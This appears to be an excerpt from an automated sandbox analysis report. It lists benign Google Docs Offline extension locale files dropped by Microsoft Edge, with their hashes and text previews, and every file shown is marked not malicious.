                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\sr\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1320
                                                                                                                                                                                                                                                                  Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                  MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                  SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                  SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                  SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\sv\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):884
                                                                                                                                                                                                                                                                  Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                  MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                  SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                  SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                  SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\sw\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):980
                                                                                                                                                                                                                                                                  Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                  MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                  SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                  SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                  SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\ta\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1941
                                                                                                                                                                                                                                                                  Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                  MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                  SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                  SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                  SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\te\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1969
                                                                                                                                                                                                                                                                  Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                  MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                  SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                  SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                                  SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\th\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1674
                                                                                                                                                                                                                                                                  Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                  MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                  SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                  SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                  SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\tr\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1063
                                                                                                                                                                                                                                                                  Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                  MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                  SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                                  SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                  SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\uk\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1333
                                                                                                                                                                                                                                                                  Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                                  MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                  SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                  SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                  SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\ur\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1263
                                                                                                                                                                                                                                                                  Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                  MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                  SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                  SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                  SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\vi\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1074
                                                                                                                                                                                                                                                                  Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                  MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                  SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                  SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                  SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\zh_CN\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):879
                                                                                                                                                                                                                                                                  Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                  MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                  SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                  SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                  SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\zh_HK\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1205
                                                                                                                                                                                                                                                                  Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                  MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                  SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                  SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                  SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\zh_TW\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):843
                                                                                                                                                                                                                                                                  Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                  MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                  SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                  SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                  SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\zu\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):912
                                                                                                                                                                                                                                                                  Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                  MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                  SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                  SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                  SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                  Download File
